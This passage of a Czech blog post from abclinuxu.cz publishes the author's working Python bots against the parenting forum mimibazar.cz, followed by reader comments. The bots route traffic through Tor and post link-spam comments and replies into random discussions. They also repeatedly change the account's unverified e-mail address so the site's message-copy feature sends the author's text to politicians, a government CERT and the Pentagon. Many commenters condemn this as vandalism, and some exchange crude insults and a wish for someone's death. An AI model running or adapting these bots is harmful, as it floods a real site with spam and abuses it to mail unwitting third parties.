                    texty.append("sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! sněhoví pusinky!! hele")
                    
                    pusinky_url=" https://www.abclinuxu.cz/blog/GretinBlogisek/2020/1/gretiny-snehovy-pusinky"
                    
                    # třeba desetkrát hodíme novej koment do nedávno diskutovanejch diskuzí
                    for i in range(10):
                    
                        post_data={
                            "insert": "ok",
                            "text": random.choice(texty)+pusinky_url
                            }
                        
                        url="https://www.mimibazar.cz/novy_diskusni_prispevek.php"
                        
                        #hodíme náhodně do nějaký z poslednějších diskuzí vyplněním query kódu
                        post_params={
                            "forum": random.choice(codes)
                            }
                        
                        
                        req=session.post(url,data=post_data,params=post_params)
                        print(req.text)
                        print(req.status_code)
                        print(url)
                        
                        
                    
                    #teď budeme reagovat na náhodnej komentář v diskuzi
                    reakce=[]
                    
                    reakce.append("tohleto mi děsně připomíná mý sněhoví pusinky!!")
                    reakce.append("hmmmmmm. a co si myslíš o mejch sněhovejch pusinkách??")
                    reakce.append("moje sněhoví pusinky by byly proti jako!!")
                    reakce.append("krásný!! ale tak krásný jako mý sněhoví pusinky to teda neni!!")
                    reakce.append("a co bys řekla na mý sněhoví pusinky?? :-) :-) :-) :-)")
                    reakce.append("extra tobě prozradim něco o sněhovejch pusinkách!! ale pššššššššš!!!!")
                    reakce.append("chceš si přečíst jako něco tajnýho o sněhovejch pusinkách??")
                    reakce.append("nejrači bych ti zavřela pusu. svou sněhovou pusinkou!!!! (koule) (koule) (koule) (koule)")
                    reakce.append("z toho co pišeš mi je jasný že nevíš jak se dělaj sněhoví pusinky. tak hele")
                    reakce.append("pššššššššššššššš!! uplně supr recept na sněhoví pusinky")
                    reakce.append("moc hezky si to napsala. tak hezký jsou na světě už jenom akorát mý sněhoví pusinky!!")
                    reakce.append("normálně si mě urazila tim co pišeš!! se s tebou usmířim jen když upečeš mý sněhoví pusinky jako!!!! (koule) (koule) (koule) (koule)")
                    reakce.append("máš takovej smutnej obličej. nedáš si sněhovou pusinku??")
                    reakce.append("si myslim že umíš uplně supr vařit. co si jako myslíš o mejch sněhovejch pusinkách????")
                    reakce.append("chceš sněhovou pusinku žejo?? :-) :-)")
                    reakce.append("hádej hádej hadači jak se jako dělaj sněhoví pusinky")
                    reakce.append("nebudeš se jako zlobit když ti sem hodim svůj receptík na sněhoví pusinky??")
                    reakce.append("chceš nebo nechceš tady máš receptík na sněhoví pusinky!!!!!! tak!!!!")
                    reakce.append("hele!!!!")
                    reakce.append("tebe už sem dlouho neviděla (hello) (hello). nedáš si sněhovou pusinku jako????")
                    
                    for i in range(50):
                        
                        #nejdřiv si načteme náhodnou poslední diskuzi
                        url="https://www.mimibazar.cz/diskuse.php?forum="+str(random.choice(codes))
                        req=session.get("https://www.mimibazar.cz/posledni_prispevky.php", proxies=tor_proxy,headers=headers)
                        print(req.status_code)
                        
                        #najdem si jednotlivý komentáře
                        #jsou v tom html jako tabulky s css třídou 't2'
                        comments=soup.find_all("table",{"class": "t2"})
                        
                        #vybereme náhodnej koment
                        print("koment: ")
                        comment=random.choice(comments)
                        print(comment)
                        
                        #href předposledního odkazu v html komentáře je možnost "odpovědět"
                        link=comment.find_all("a")[-2]["href"]
                        
                        #vytáhneme z url query id
                        id=link.split("=")[1]
                        print(link)
                        print(id)
                        
                        #no a mužem to všechno poslat hurrrrrááááááá!!!! :D
                        
                        post_data={
                            "insert": "ok",
                            "text": random.choice(reakce)+pusinky_url
                            }
                        post_params={
                            "id": id
                            }
                        req=session.post("https://www.mimibazar.cz/novy_diskusni_prispevek.php",data=post_data,params=post_params)
                        print(req.text)
                        print(req.status_code)
                        print(url)
                            
                        
                    
                    print("Hotovo!!!!!!!!!!!!")
                    return True
                    
            time.sleep(5)
            
        
        print("Mail nepřišel :'(")
        
       
register()

A tady je skriptík na posílání psaníček. Jsem si teďko přečetla log a von se nějak divně zašprcnul na tom pentagonu :O :O buďto po mě radovanoj a sumcoj jde CIA nebo mimibazar tu mailovou adresu nevidí jako validní. Na co byste jako vsadili?? :D :D :D :D takže iinfo a ježek zustali bez pusinek :'( Nějakej dobrovolník by jim to moh zkusit znova poslat aby nebyli ošizený, já teď prozatim na mimibazar peču ;D

#!/usr/bin/python3
# -*- coding: utf-8 -*-

import time
import requests
import random
import string

tor_proxy = {
    'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'
}

#hlavička z tor browseru
headers = { 
    'User-Agent': "Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0",
    'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    'Accept-Language': "en-US,en;q=0.5",
    'Accept-Encoding': "gzip, deflate, br",
    'Connection': 'keep-alive',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Host': 'www.mimibazar.cz'
    }

#abclinuxu je tam už zakázaný slovo takže jako musíme použít zkracovač :O :O :D :D
url_pusinky="https://miffy.me/HnbR"

text_mailu=" Mimibazar.cz je samá díra a hodnou Grétu co ty dirky našla pořád jenom banujou a když o nich piše a snaží se mamkám z mimibazaru pomoct tak jsou na ni akorát strašně sprostý a ty díry jako vubec neopravujou :'( :'( Proto se na vás jako obracim abyste těm pitomejm hloupejm mamkám vysvětlili že Gréta je jako ta hodná a poslouchaly co jim jako ta hodná Gréta radí a že to teda jako je vostuda že malilililinkatatatatá Grétulilililinka umí víc než jejich placený lopaty ale neni to zase tak děsná vostuda než mit tragikomicky nezabezpečenej web!!!! A za vodměnu si mužete jako upíct sněhový pusinky "+url_pusinky

maily=[]

#kontaktujeme prezidenta a premiéra :O :O :D :D

maily.append(["vratislav.mynar@hrad.cz","Vážený pane Mynáři!!!! Nemoh byste trošku toho svýho syna srovnat jak furt dělá jakože ty stávky?? Ale kuli tomu vám jako nepišu."])
maily.append(["jiri.ovcacek@hrad.cz","Vážený Ovčáčku!!!! Mam děsně tajnej recept pro pana prezidenta!!"])
maily.append(["premier@vlada.cz","Vel'komóžny pán Babiš!!!! "])

#napišeme pirátům. kdo jinej by internetovejm dírám jako měl víc rozumět než piráti?? ;D
maily.append(["ivan.bartos@pirati.cz","Vážený pane bukanýre!!!! "])
maily.append(["richterovao@psp.cz","Vážená mrňavá pirátice!!!! "])
maily.append(["radek.holomcik@pirati.cz","Ty jeden holomku!!!! "])
maily.append(["marcel.kolaja@pirati.cz","Vážená koalo!!!! "])
maily.append(["marketa.gregorova@pirati.cz","Vážená ukulelistko!!!! "])
maily.append(["mikulas.peksa@ep.europa.eu","Vážené pexeso!!!! "])
maily.append(["jakub.michalek@pirati.cz","Míšo!!!! Mam děsně tajnej úkol pro tvý šikanovací suprschopnosti!!!!!!! ale ppppššššššššššššššš!!!!! "])

#jsem náhodou narazila na pirátím blogísku na maily těhletěch dvou senátorů 
maily.append(["vaclav.laska@vaclavlaska.cz","Vážená lásko!!!! "])
maily.append(["renata.chmelova@vlasta10.cz","Vážená Chmelařko!!!! "])

#taky napišeme do nukibu a do civilní sekce pentagonu :O :O
maily.append(["cert.incident@nukib.cz","Váženej úřade pro dělání kybernetický bezpečnosti!!!! "])
maily.append(["osd.business.defense@mail.mil","Dear Pentagon!!!! "])

#kontaktujeme reklamní oddělení rootu :D :D
maily.append(["marketing@iinfo.cz","Vážené iinfo!!!! ty tam máš reklamu na kdejakou blbost jako na těch svejch stránkách. Mohlo bys tam jako hodit i reklamu na muj receptík?? "])
maily.append(["obchod@iinfo.cz","Vážené iinfo!!!! ty tam máš reklamu na kdejakou blbost jako na těch svejch stránkách. Mohlo bys tam jako hodit i reklamu na muj receptík?? "])
maily.append(["info@iinfo.cz","Vážené iinfo!!!! ty tam máš reklamu na kdejakou blbost jako na těch svejch stránkách. Mohlo bys tam jako hodit i reklamu na muj receptík?? "])

for m in maily:
    m[1]+=text_mailu

#sem málem zapoměla na davida ježka :O :O :D :D
maily.append(["jezekdavid@gmail.com","rytíři Ježku právem překvapení ti posílám uplně supr receptík na sněhoví pusinky!!!!!!!! "+url_pusinky])


for m in maily:
    print(m)

def psanicka():
    
    #vyrobíme si objekt session kterej bude držet jakože naše sezení
    #potřebujem když se chceme dostat za heslem chráněnej obsah abysme mohli do diskuzí poslat odkaz na náš báječnej recept
    session = requests.session()
    session.proxies=tor_proxy
    session.headers=headers
    post_data={
        "login": "Gretulinka",
        "password": "12345",
        "log_in": "ok"
        }

    req=session.post("https://www.mimibazar.cz/index.php",data=post_data)
    print(req.text)
    print(req.status_code)
    print(req.cookies)
    time.sleep(5)
    
    for m in maily:
        
        time.sleep(5)
        #nejdřiv si přenastavíme emailovou adresu v nastavení profilu
        #ty další kraviny jsou tušim poviný ale možná taky ne
        post_data={
            "oblast": "Česká Lípa",
            "email": m[0],
            "edit": "ok",
            "send": "UPRAVIT"
            }
        
        req=session.post("https://www.mimibazar.cz/uprava_uctu.php",data=post_data)
        print(req.text)
        print(req.status_code)
        
        time.sleep(5)

        #no a pošleme soukromou zprávu fóra nějakýmu dalšímu uživateli s tim že nastavíme kopii na '1' 
        #aby to poslalo kopii toho posílanýho vzkazu na 'naši' emailovou adresu :D :D :D :D
        post_data={
            "text": m[1],
            "kopie": "1",
            "send": "ok"
            }
        
        post_params={
            "id": "137273" #to id profilu nějaký jiný gréty co tam jako už dávno byla :O :O
            }
        
        req=session.post("https://www.mimibazar.cz/novy_vzkaz.php",data=post_data,params=post_params)
        print(req.text)
        print(req.status_code)
        print()
        
    return True

        
       
psanicka()
       

Hodnocení: 56 %

        špatnédobré        

Anketa

A protože tady jako uplně všichni milujeme bublinkový fólie tak tady je jako taková malá anketa ;D

Gréta by si zasloužila...
 (42 %)
 (31 %)
 (17 %)
 (33 %)
 (13 %)
 (14 %)
 (23 %)
 (52 %)
 (25 %)
 (34 %)
Celkem 64 hlasů

Obrázky

mimibazar je děsně nebezpečnej, obrázek 1 mimibazar je děsně nebezpečnej, obrázek 2 mimibazar je děsně nebezpečnej, obrázek 3 mimibazar je děsně nebezpečnej, obrázek 4 mimibazar je děsně nebezpečnej, obrázek 5 mimibazar je děsně nebezpečnej, obrázek 6

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

Komentáře

Vložit další komentář

21.1. 20:41 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
"Debilní Gréta"? Mají to tam paní nějaký politicky nekorektní, místní klimakněží by se tam měli stavit na misijní práci.
Quando omni flunkus moritati
Max avatar 21.1. 20:48 Max | skóre: 68 | blog: Max_Devaine
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Za technickou stránku jedna, za morální trojku z chování a ředitelskou důtku.
Zdar Max
Měl jsem sen ... :(
Luboš Doležel (Doli) avatar 22.1. 10:25 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Chování: Je to hnus.

Technika: Technicky ultimátní by bylo přes blogísek se skriptem krást cizí cookies a shitpostovat přes cizí účty, jestli to tam jde.
Gréta avatar 22.1. 12:43 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

jenže já už jako nevim jak jim jako pomoct :'( :'(

byste těm matronám taky mohli napsat ať si to jako opravěj mě už to unavuje pomáhat někomu kdo je na mě akorát sprostej :'(

24.1. 21:49 Odin1918 | skóre: 5 | blog: Valhalla
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Je to nechutnost. Doufam, ze jej rakovina sezere za ziva stejne jako kolibace.
Marián Kyral avatar 21.1. 21:24 Marián Kyral | skóre: 29 | blog: Sem_Tam | Frýdek-Místek
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Žena říkala, že prý migrovali na novou verzi a prý se jim to ani po týdnu nepovedlo. Se nedivím, když jsi je tak zaměstnával ;-)
Gréta avatar 22.1. 12:35 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

zas tak moc jsem je teda jako nezaměstnávala když nato co jim tam x dní pišu že musej opravit kašlaly a ani mi nepoděkovaly pak mi nejdřiv přestaly odepisovat a pak dokonce začaly bejt děsně ošklivý :'( :'(

byste jim to jako mohli jít nějak vysvětlit ale myslim si že zase budou jenom igorovat nebo nadávat :'( já už na ně peču prostě ty mamčině kámošce napišu že s těma matronama neni jako vubec žádná řeč :'( já mam svědomí čistý uďála sem všechno co bylo v mejch silách ;D

21.1. 22:05 kvr
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Po titulku jsem si říkal, že to bude něco zajímavějšího, takže první Grétin blog, který jsem dokázal nějak přelouskat do konce.

Pominu-li nečitelnost a budu komentovat čistě technickou stránku, tak (pokud jsem něco nepřehlédnul, jakože asi spoustu detailů ano) kritická chyba je jediná - cross-site scripting v blozích.

Zbytek:
  • Posílat první písmeno z hesla je samozřejmě blbost, ač při registraci, o ukládání v DB to ale nic nevypovídá.
  • Změna e-mailu bez potvrzení je blbost obecně - když udělá uživatel chybu, tak už jej nezmění zpátky, pokud zapomene heslo nebo aktuální session. Ale nějak extra kritické to není. To, že to je potenciálně zneužitelné ke spamu - to jsou prakticky všechny diskusní fóra, ale řekl bych, že jsou triviálnější způsoby ;-)
  • Změna hesla bez znalosti předchozího hesla - bylo by hezké, 2FA by bylo ještě hezčí, ale opět to není nic kritického. Stále to znamená ukradnout někde session cookie, což není úplně triviální. Hlavně je to skoro jedno, pokud útočník změní e-mail (obvykle nevyžaduje staré heslo) a pak dá reset hesla přes e-mail, čímž trpí nejspíš mnohem víc webů.
Jakkoliv to nechcu bagatelizovat, je to takový standard platforem potenciálně otevřených ke spamování, nic moc navíc.
22.1. 10:46 GloGlo
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
"Změna hesla bez znalosti předchozího hesla"
No, jestli tam maj všude CSRF, tak je to velkej průšvih. On totiž formulář pro změnu hesla jde odeslat javascriptem i z úplně jinýho webu. A ukrást účet nemusí být cílem.
22.1. 10:47 GloGlo
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
pardon, "může jít odeslat"
Gréta avatar 22.1. 12:41 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

Posílat první písmeno z hesla je samozřejmě blbost, ač při registraci, o ukládání v DB to ale nic nevypovídá.

náhodou to dost vypovídá jakým způsobem k těm heslům jakože přistupujou a jak s nima asi taky jako zacházej. a do celý tý mozajky mi to taky jako sedí a klidně bych se vsadila že mam pravdu ;D

21.1. 22:13 _
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Naše Gréta je savage xD
22.1. 09:42 Evzen
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

Dobře ti tak píčo.

Gréta avatar 22.1. 12:47 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

jo!!!! dobře ti tak šéfadminko ;D

si asi jako myslíš že mě rozhodilo pár hambatejch slovíček jóóóó?? náhodou jsem jako dost votrlá ;D bys nevěřil co mi matrony psaly za šílený věci :O :O by sis normálně myslel že si to vymejšlim :O :O

22.1. 13:34 _
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Tak pokud si tam taky parodovala Gretu, tak se nediv.
xkucf03 avatar 22.1. 13:18 xkucf03 | skóre: 49 | blog: xkucf03
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
blogísek s javascriptem

Možnost vkládat JavaScripty měli i na Rootu. Vtipné na tom bylo, že tam tehdy zrovna inzerovali nějaká svoje školení o bezpečnosti webů :-)

Mám rád, když se lidé přou, znamená to, že vědí, co dělají, a že mají směr. Frantovo.cz, SQL-DK, Relational pipes
Jendа avatar 22.1. 15:39 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Jsi fakt píča. To působení tady docela šlo, hlavně od doby, co jsi kromě trollování začala postovat i docela použitelný technický obsah. Ale dělat někomu sybil attack na web, to fakt ne.
Gréta avatar 22.1. 17:14 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

já jenže to myslela dobře :'( :'( :'( :'( ty mi tady zanadáváš a zase si pudeš po svým a za mitutu dvě zapomeneš že nějakej mimibazar existuje. já to snima zkoušim řešim už čtrnáct dní!!!!!!!!!!! :'( :'( si to běž tam klidně zkusit jako schválně jak dloho bys to vydržel jim pomáhat myslim že ani ne den :'( a těch použitejch botů bylo jenom pár a házela jsem tam celkem neutrální obsah jakože ty svý sněhový pusinky a přitom bych to co vám tady ukazuju šlo použít mnohem líp a taky sem možná nepišu všecko co tam je blbě ale já už na to kašlu di to tam řešit třeba ty :'( :'(

23.1. 00:49 GloGlo
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Jo, je. Tohle se prostě nedělá.. Na druhou stranu, na intervalu mezi "být normální rozumnej člověk", a "udělat jim z toho kůlničku na dříví", si vybrala jenom "bejt pěknej zmrd". Třeba z toho vyroste...
23.1. 01:34 Tomáš Roll
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Proč myslíš, že se cokoli z toho stalo? Jsou o tom nějaké nezávislé důkazy nebo čerpáš jen z toho, co ti o sobě Gréta sama napsala? Třeba je to jen důmyslný způsob, jak zamaskovat její/jeho pravou identitu, protože těch indicií je tu už docela dost (python, blender, skriptování webů...), ale takhle nemorálně by se dotyčná osoba nechovala, takže to "podezření" vyvrací.
Jendа avatar 23.1. 01:42 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
23.1. 02:19 -
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

Všichni dávno vědí, že je to Amigapower.

Jendа avatar 23.1. 03:41 Jendа | skóre: 76 | blog: Výlevníček | JO70FB
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Amiga podle mě neuměl takhle programovat (jo, mohl se to naučit, ale… ožrala ;)).
23.1. 11:08 _
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
A myslíš, že tyhle věci může někdo dělat a psát ve střízlivém stavu?
23.1. 12:07 €mil
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
python + blender + kofeinovy suplement = Greta
23.1. 13:57 Ike
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Greta is great. Tohle je jen trapná parodie.
23.1. 03:49 Moralista
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Mohl jsi to Grétě napsat i jinak, třeba slušně...
23.1. 19:46 _
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Nechápu proč se chováš tak histericky Jendo. Server nebyl zlikvidován pouze tam bylo trošku zaspamováno. Hesla neukrad a databáze nebyla poškozena. Ani logovací cookies nešlohnul. Naopak všichni noobové kteří si přečetli tenhle blogpost vědí jak nedělat svoje webovky. Budu upřímný, jediný co je na abc zajímavý poté co odešel Bystroushaak je komix a Greta. Pokud se ti to nelíbí tak začni něco zajímavého psát ty místo vyřvávání vulgarit na ostatní.
Bystroushaak avatar 23.1. 20:56 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Nechápu proč se chováš tak histericky Jendo.
Já si myslím, že zpětná vazba je třeba. Tohle zrovna bylo fakt dětinské a i když ne vysloveně destruktivní vůči webu, tak vůči jeho uživatelům ano. Web a obecně celá lidská společnost stojí do velké míry stojí na tom že lidé se nechovají jako zmrdi. Vandalismus zůstane vandalismem, i když si Gréta a pár dalších asi myslí jakou tím prokazují úžasnou bezpečnostní kritiku a pomoc.
Pokud se ti to nelíbí tak začni něco zajímavého psát ty místo vyřvávání vulgarit na ostatní.
Jenda toho dělá docela dost zajímavého, jen musíš koukat na brmwiki.
Budu upřímný, jediný co je na abc zajímavý poté co odešel Bystroushaak je komix a Greta.
Já jsem „neodešel“, jen toho vydávám v češtině poslední dobou minimum a anglické články sem neposílám, protože reakce byly vesměs negativní a dementní. Časem sem zase něco hodím, až budu mít něco česky.

Můj osobní názor na aktuální stav abclinuxu je vesměs takový, že jeho užitečnost pro mě vypršela. Většinu interakcí dostávám jinými kanály a s lidmi se kterými mě tu bavilo diskutovat jsem ve spojení přímo.

Zdejší tolerance k trolení a spamování diskuzí píčovinama mi přijde přehnaná a destruktivní, redakční systém stojí za hovno, spousta lidí, které jsem osobně potkal třeba v práci, co sem dřív chodili, ani nevěděli, že tu jsou blogy. Když se podívám i na ty nejčtenější blogy tady, tak na vlastním blogu tyhle počty dávám za den, co se tady naakumuluje za měsíc. Diskuze tu jsou sice vesměs živější, ale poslední dobou je tu zvykem, že cca jedna pětina všeho pod libovolným blogem jsou toxické sračky. Takže ani moc není proč sem nadále psát a vystupovat tady.

Poslední dobou jsme několikrát s kralykem a frantou řešili, že by bylo fajn mít nějakou platformu na dlouhodobější technické diskuze, pravděpodobně invite-only, ale zatím z toho nic nebylo. Máte někdo nějaké nápady? Zkoušel jsem discourse, ale moc mi to nesedlo.
23.1. 21:23  
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
SAMEFAG
24.1. 10:01 Bystroushaak je farizej
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
reakce byly vesměs negativní a dementní

Jsi fakt píča

24.1. 18:17 AD
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
+1 za zpetnou vazbu. Destrukci nikdy neschvaluji.

Troleni je treba ignorovat, lide jako to jsou vsude. Ale kdyz nekdo pise o necem toxickem, tak to je vetsinou nim.

A technicke diskuze invite-only? Circlejerk je preci vzdycky treba a z tech schopnych lidi se da vybirat...
27.1. 12:33 j
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Hele, ale kdyz nekomu napises, ze ma neco blbe a on te stim posle doprdele a nic s tim nedela, tak jak jinak ho chces donutit k tomu, aby s tim neco udelal? Nehlede na to, ze tim viz niz, porusuje i zakony.
Bystroushaak avatar 27.1. 14:36 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Tak jednak je tady otázka, jestli má fakt smysl někoho nutit něco dělat proti jeho vůli, ale hlavně imho bývá zvykem o tom sepsat report a ten publikovat.
27.1. 15:13 kotrcka | skóre: 23 | blog: Onééé 2 | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Nie je toto (áno, svojský) report?
You son of a bit.. coin
Bystroushaak avatar 27.1. 15:21 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Ach jo. Ano, je to svého druhu report. Jak už jsem tu několikrát vysvětloval, problém vidím v tom zneužití chyby spambotem a pak ještě zveřejnění těch spambotů. Ale whatever, co jsem říct chtěl jsem řekl a dál mě to moc nezajímá.
Gréta avatar 4.2. 11:51 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

lišáčku jenže vony mě jako fakt vůbec neposlouchaly :'( :'( ty jsou tak pitomí že by si myslely že to tam jako všecko pišu ručně neukázat jim zdrojáčky :O :O :D :D :'( :'(

mi jako připadá horší šlohnout profil nebo ukázat hesla nebo tak něco než udělat stračně moc komentů s rceptem na sněhový pusinky ;D a si myslim že grétobot stačil už to asi vopravujou takže win hele ;D

22.1. 17:12 koroptev
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Díky za tip na selenium, jestli se tím dá klykat na tagy ve zdejších blozích tak jsem právě ušetřil desítky hodin týdně B-)
otasomil avatar 22.1. 17:33 otasomil | skóre: 38 | blog: puppylinux
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
No pekne. Kazdopadne bych neutocil, je to web pro lidi kteri maj k informatice daleko a nebudou do toho stourat. Vy znate problematiku tak vite a nestacite se pochopitelne divit. Uz je to docela davno kdy jsem patrne omylem pri podrzenym CTRL a klikanim na vysledky hledani se dostal na profil nejakyho chlapka v eroticke seznamce, nestacil se divit jeho potrebam a tomu co sou ochytny zensky napsat a zkusit... Puvodne sem se domival ze je to nejaky predvadeci profil. Poslal jsem pres kontaktni formulat vzkaz na admina at s tim neco udelaj pac profil jeho platiciho klienta je verejne dostupny komukoliv a jak to dopadlo? asi nijak profil stale dostupny, chlapek pise zenskejm jako by se nechumelilo a zbytek sveta se muze bavit...
K čemu hudba, která nevede k extázi... Stop MDMA !!! I spam umí být roztomilý
22.1. 18:50 trekker.dk | skóre: 71
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Problém je, že i když nezaútočí gréta, může to udělat někdo jinej... a škodit tak všem ostatním.
Quando omni flunkus moritati
22.1. 19:00 OldFrog {Ondra Nemecek} | skóre: 32 | blog: Žabákův notes | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
V daném případě by bohatě stačilo provozovatele na problém upozornit.
-- OldFrog
22.1. 18:07  
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

Bherzet se zase nudil?

22.1. 18:47 j
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Vazne jim chces pomoct? To jako fakt? Tak je praskni ... GDPR. Zpracovatel udaju je totiz povinen je zabezpecit. Pokud je web deravej jak reseto, tak tuhle povinost zcela jiste neplni.

A porusujou to ve velkym i dal ...

"Zpracovávané osobní údaje, právní základ a účel zpracování

Registrací do služby Mimibazar provozované na našich internetových stránkách (dále jen „Služba“) s námi uzavíráte smlouvu. Tato smlouva je právním základem pro zpracování osobních údajů. "

Tohle samo o sobe je v primym rozporu s GDPR (povinost sluzbu poskytnout i bez souhlasu se zpracovanim udaju). Ostatne v rozporu s tou legislativou jsou ty zvasty uplne cely ...

https://www.mimibazar.cz/page.php?id=73
24.1. 21:48 Odin1918 | skóre: 5 | blog: Valhalla
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Pokud z podstaty poskytovane sluzby potrebujes data k poskytnuti, jedna se o opravnene vyuziti blbecku. Na to pamatuje i ta tva gdpr.
27.1. 12:34 j
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
A vis ty imbecilni negramote, ze ta data ses povinen zabezpecit, a ze ty kretene ta data NESMIS vyuzivat nijak jinak, nez jak je naprosto NEZBYTNY? Zjevne nevis, protoze to bych te pak neoznacoval za negramotnyho imbecilniho kretena!

Takze zadny sdelovani tretim stranam, zadny vyhodnocovani a personifikace reklam, zadny obtezovani spamem ... to vsechno totiz nesmis! A to vsechno si v tech neplatnych podminkach vyminujou. K tomu totiz souhlas dat muzes, ale ten NESMI byt vazan na vlastni poskytnuti sluzby!

Ale co by clovek nechtel od negramota, kterej si ty +-4 odstavce textu coz je cely GDPR, neumi precist.
23.1. 16:47 Radovan
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Není zač. Je to pod licencí "dělej si s tím co chceš", takže si s tím dělej co chceš :-)
24.1. 22:48 Karel Benák | skóre: 8 | blog: benyho
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Obě Gréty by potřebovaly psychiatra, sedativa a ledové střiky. ABC Linuxu šlo do těžkého kopru :-(
Láska je jako prd, když hodně tlačiš tak z toho bude ...
24.1. 23:10 Odin1918 | skóre: 5 | blog: Valhalla
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Nahodou je s podivem, ze po tolika letech, kdy zde dad zacal psat sve jedovate levicove pomylenosti, to zde takto zije. Gretin utok na matky vsak neschvaluji.
25.1. 01:12 _
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Pravá Greta sedativa nepotřebuje, ale ty zjevně ano. Máš bez řadicí páky pocit, že nejsi chlap?
Gréta avatar 12.2. 18:02 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

jojo a taky by jako potřebovaly vomluvenky na čédinu ;D

už si doma zišťoval jestli ty tvý blance v práci nezbejvaj nejaký omluvenky navíc?????? třeba nějaká taková u který hrozí že bude expirovat nikdo si ji určitě už jako neveme ani uklízečka na zabalení chleba se sádlem. by byla škoda omluvenku jen tak skartovat když muže ještě posloužit dobrý věci ne??

25.1. 12:21 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

